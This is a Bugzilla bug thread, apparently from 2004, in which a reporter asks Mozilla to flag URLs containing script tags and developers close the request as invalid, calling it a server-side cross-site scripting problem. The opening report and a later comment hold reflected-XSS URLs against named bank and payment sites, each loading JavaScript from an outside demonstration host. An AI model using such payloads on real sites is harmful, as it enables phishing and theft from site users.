Closed
Bug 252185
Opened 21 years ago
Closed 21 years ago
URL with a script <Script=
Categories
(SeaMonkey :: Location Bar, defect)
Tracking
(Not tracked)
RESOLVED
INVALID
People
(Reporter: famtie, Unassigned)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2
See Article. I have tested into
Firefox 0.9.2 and Mozilla 1.7.1
When you clicked :
http://www.mastercard.com/cgi-bin/atm/atm.cgi?region=uk&country=gbr&city=%3Cscript%20src='http://www.zapthedingbat.com/security/scriptinjection/mastercard.js'%3E%3C/script%3E
You think that www.mastercard.com may be a trusted site. but you must to read
what you can't trust this site.
It seems that new bug is very dangerous. It must be fixed this bug.
Reproducible: Always
Steps to Reproduce:
1. you click with above URL
2. it like to a real site but it's FAKE website.
Summary: URL with a script is dangerous! Remove <Script= from URL. → URL with a script <Script=
|
||
Comment 1•21 years ago
|
||
I'm sorry, but this is a bug in the website, not in mozilla.
Additionally, it seems that this url trick no longer works.
hence, this does not need to be kept confidential.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 21 years ago
Resolution: --- → INVALID
it's a bug .but mastercard has disabled this url but another urls in list of
aricle. read this article first.
Status: RESOLVED → UNCONFIRMED
Resolution: INVALID → ---
(In reply to comment #2)
> it's a bug .but mastercard has disabled this url but another urls in list of
> aricle. read this article first.
And it's very dangerous if you think that real website but it would be fake
website when you are using <script> </script>
it would be ?q=<script>code </script>
it would be added warning that script would be executed.
http://www.worldpay.co.uk/search/index.php?q=<script%
20src='http://www.zapthedingbat.com/security/scriptinjection/worldpay.js'></scr
ipt>
A second example url
The links below demonstrate just how easy it is to inject this press release
onto some of the most trusted sites we use. Pay attention to the domain
displayed in the address bar of the browser window which they open.
MasterCard
GCHQ
Natwest
Nochex
WorldPay
Barclaycard
Reuters
Sky
it would more websites
[url]http://www.worldpay.co.uk/search/index.php?q=<script%
20src='http://www.zapthedingbat.com/security/scriptinjection/worldpay.js'></scr
ipt> [/url]
http://www.barclaycard.co.uk/search_results.html?search=<script%
20src='http://www.zapthedingbat.com/security/scriptinjection/barclaycard.js'></
script>
it's big problems:
php, html and cgi.
added
In the wake of MasterCard and NameProtect’s recent PR hype announcing their
aggressive drive to fight fraud on the web, this dynamic duo seem to have
missed some all too basic gaps in their own security.
Along with their colleagues at Natwest, Barclaycard, WorldPay, Nochex and even
the GCHQ, not to mention an almost endless list of further high profile sites,
MasterCard have still left chinks in the armour of their own site.
The oversight of some basic security flaws allows hackers to send a user to
the site while displaying any content and functionality of the hacker’s choice.
The security flaw that so many of these sites have overlooked is that
of ‘cross site scripting’ or ‘script injection’. At face value, this flaw
seems not a great threat, being nothing more complex than echoing back what
gets typed in a textbox. The reality is that this simple oversight throws open
the doors to an even more dangerous breed of the very ‘Phishing’ scams that
Mastercard has pledged to stop.
‘Phishing’ is a term originating from the ‘hacker’ fraternity, and is a form
of web-based con artistry. The user is coerced into supplying sensitive,
predominantly financial information, usually to a malicious website
masquerading as its genuine counterpart. This technique relies on the
gullibility of the user, neglecting to notice the telltale signs of the rogue
entrapment site – one location disguised as another.
In contrast, what makes cross site scripting vulnerabilities far more
dangerous is that the genuine site is itself manipulated to display spurious
content, rendering it almost undetectable to the victim.
Astonishingly, some of the most potentially sensitive sites on the internet to
this form of exploitation are still openly susceptible.
Script injection is easy to protect against. Protecting a website against
these attacks takes nothing more than a little forethought from its developers.
The point is, this is not a Mozilla bug, unless you are requesting a warning for
URLs containing <script> tags. Even with such a warning, a malicious person
could still include arbitrary HTML in insecure pages like that - you'd get no
real security benefit.
Status: UNCONFIRMED → RESOLVED
Closed: 21 years ago → 21 years ago
Resolution: --- → INVALID
|
Reporter | |
Comment 10•21 years ago
|
||
if you are expert,you are safe. But if you are NOT expert THEN you will be
victum if you don't understand what is scirpt ..
|
|
Reporter | |
Comment 11•21 years ago
|
||
For urls :
if url == "<script>" then it would be mesagge invalid (errors)
Status: RESOLVED → UNCONFIRMED
Resolution: INVALID → ---
There are more ways to add false content than the <script> tag. A malicious
person could include an iframe, some other object with javascript onmouseover or
onload, a <div> that covers the whole screen, and so on.
If we warned on any URL containing a "<" in it, many people would get the
warning unnecessarily on pages that used forms with method="get".
It's a false sense of security you'd be getting anyway, because there's always
the possibility we'd miss a way to inject content, and not warn the user when
they were really being presented with false content.
Seeing as you've already reopened this bug twice, I'll let somebody else resolve
it invalid (or wontfix) again.
Severity: critical → normal
Component: Location Bar → French
OS: All → other
Product: Browser → Tech Evangelism
Hardware: PC → Other
Version: Trunk → unspecified
Component: French → Location Bar
Product: Tech Evangelism → Browser
Version: unspecified → 1.7 Branch
Component: Location Bar → French
Product: Browser → Tech Evangelism
Version: 1.7 Branch → unspecified
|
|
Reporter | |
Comment 13•21 years ago
|
||
not in browser
but in url location allowed only ?,= and &
for example:
http://www.test.com
it's valid
http://www.test.com?id=1
it's valid
http://www.test.com?id=<test>
it would be invalid.
http://www.test.com?id=1&test=2
it would be valid
http://www.test.com/echo?id="hallo"
it would be valid
this url may be not longer then 128 charachters.
http://www.test.com/echo?id=<script> test </script>
it must be invalid.
Component: French → Location Bar
Product: Tech Evangelism → Browser
Version: unspecified → 1.7 Branch
|
||
Comment 14•21 years ago
|
||
Would you mind not overruling the experts, ie CTho and timeless? They usually
know what they're doing.
Component: Location Bar → French
Product: Browser → Tech Evangelism
Version: 1.7 Branch → unspecified
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Component: French → Location Bar
Product: Tech Evangelism → Browser
Version: unspecified → 1.0 Branch
Assignee: location-bar → famtie
Component: Location Bar → French
Product: Browser → Tech Evangelism
Version: 1.0 Branch → unspecified
|
|
Reporter | |
Comment 15•21 years ago
|
||
WARNING: IF YOU IONORGE THIS BUG (OR SECURITY) HACKERS WILL USE THIS NEW
METHOD WITH URL IN COMBINATION WITH SCIRPT. MOST WEBSITE HAVEN'T FIXED BUG.
ONLY SOME WEBSITES HAVE FIXED THIS PROBLEM TODAY. BUT HACKES WOULD BE MAKE
VIRUS FOR THIS BUG/SECURITY BUG.
users are not experciend with computers will be victims of this new technoque.
this technoque was discoverd since yesterday. it would be problem bigger.
Assignee: famtie → mostafah
Component: French → Calendar Front End
OS: other → All
Product: Tech Evangelism → Calendar
QA Contact: brantgurganus2001
Assignee: mostafah → location-bar
Component: Calendar Front End → Location Bar
Product: Calendar → Browser
QA Contact: brantgurganus2001
Version: unspecified → 1.0 Branch
Status: NEW → RESOLVED
Closed: 21 years ago → 21 years ago
Resolution: --- → WONTFIX
|
|
||
Comment 16•21 years ago
|
||
> this technoque was discoverd since yesterday.
it is years old. and the resolution is wrong, it should be invalid. fixing that.
Status: RESOLVED → REOPENED
Resolution: WONTFIX → ---
|
|
||
Updated•21 years ago
|
Status: REOPENED → RESOLVED
Closed: 21 years ago → 21 years ago
Resolution: --- → INVALID
|
|
Reporter | |
Comment 17•21 years ago
|
||
(In reply to comment #16)
> > this technoque was discoverd since yesterday.
>
> it is years old. and the resolution is wrong, it should be invalid. fixing that.
How can you find this technoque?
|
|
Reporter | |
Comment 18•21 years ago
|
||
http://www.technicalinfo.net/papers/CSS.html
Better article about.. it's not old or years. It's new article.
|
||
Comment 19•21 years ago
|
||
re comment #18. The article you cite states over and over that this issue must
be resolved on the server application end. So why are you compaining that we
are not trying to fix it on the client side?
|
|
Reporter | |
Comment 20•21 years ago
|
||
(In reply to comment #19)
> re comment #18. The article you cite states over and over that this issue must
> be resolved on the server application end. So why are you compaining that we
> are not trying to fix it on the client side?
It must be protected for newbie's that don't know about computers.
|
|
Reporter | |
Comment 21•21 years ago
|
||
And most web developers are lazy to fix this problem. 10.000 clienters and 1
servers. But 60 a 70 procent are newbies. newbies don't know what are <script>.
It would be dangerous for this group.
|
||
Updated•17 years ago
|
Product: Core → SeaMonkey
You need to log in
before you can comment on or make changes to this bug.
Description
•